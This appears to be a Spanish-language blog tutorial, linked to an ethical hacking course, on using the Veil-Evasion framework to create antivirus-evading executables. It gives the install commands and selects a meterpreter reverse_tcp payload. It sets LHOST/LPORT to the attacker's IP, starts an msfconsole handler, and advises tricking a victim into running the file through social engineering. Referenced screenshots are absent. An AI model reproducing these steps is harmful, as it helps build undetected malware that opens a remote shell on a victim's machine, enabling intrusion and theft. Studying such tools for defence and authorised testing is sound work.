Veil es una herramienta desarrollada por Christopher Truncer que nos ayudará a evadir la mayoría de los antivirus en el mercado. Veil genera payloads de Metasploit que luego codifica de una manera propia y genera un ejecutable nuevo que, se espera, no sea detectado por algún antivirus
Veil no viene instalado por defecto en Kali pero hacerlo es muy sencillo. Tan solo tenemos que ejecutar los siguientes comandos:
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup/
./setup.sh
La instalación puede tardarse un buen tiempo puesto que Veil tiene que instalar una buena cantidad de librerías para su funcionamiento, puede que durante el proceso de instalación se den algunos problemas en la descarga de los paquetes, pero no es nada que no se pueda resolver leyendo el error que nos indique o Veil o nuestro gestor de paquetes.
Una vez instalado y ejecutado Veil este es el primer menú con el que nos vamos a encontrar:
Como vemos el comando list nos servirá para listar los Payloads disponibles, así que pasamos a ejecutarlo y esta es la respuesta que obtendremos:
El Payload que usaremos para esta prueba será el número 34, es un meterpreter con reverse_tcp que se ajusta totalmente a lo que queremos hacer. Sin embargo, es probable que bajo diferentes ambientes u objetivos tengamos que utilizar algún otro (Como los de Python, por ejemplo).
Una vez seleccionado el payload que queremos usar se nos mostrará la ayuda y las opciones de configuración:
Configuramos las opciones de LHOST y LPORT de la siguiente manera:
set LHOST XXX.XXX.XXX.XXX (Nuestra IP)
set LPORT 4444 (O el puerto por el que queramos recibir la conexión)
generate (Para generar el payload)
Una vez se inicie la generación del Payload tendremos que especificar el nombre para los arhivos que se generaran, si presionamos enter pondrá por defecto "payload".
Una vez finalice la generación del payload estos son los archivos que obtendremos.
Executable Written to: Indica la ruta del archivo ejecutable malicioso.
Payload File: El código en Ruby del payload que usamos.
Handler File: Un archivo que ejecutamos como parametro de msfconsole para generar el handler que reciba la conexión del payload una vez sea ejecutado.
El handler file lo pasamos con la opción -r ejecutando msfconsole:
msfconsole -r /root/veil-output/handlers-ejecuta_handler.rc
Hasta aquí ya tenemos todo lo necesario para recibir la conexión, ahora falta lo más importante: Que nuestra victima ejecute el payload. En la clase de Técnicas de Explotación del curso de Hacking ético profesional hay un vídeo en donde se explica como se pueden aplicar algunas técnicas de ingeniería social para engañar a una victima y hacer que ejecute un payload: Explotación de Windows 7 con evasión de antivirus Recordemos que diseñar un plan estratégico de Ingeniería social muchas veces será lo que decida el exito o no de un Pentest.
Cuando nuestra victima ejecute el Payload nuestro Handler se activará y mostrará una hermosa y maléfica consola de Meterpreter:
Comentarios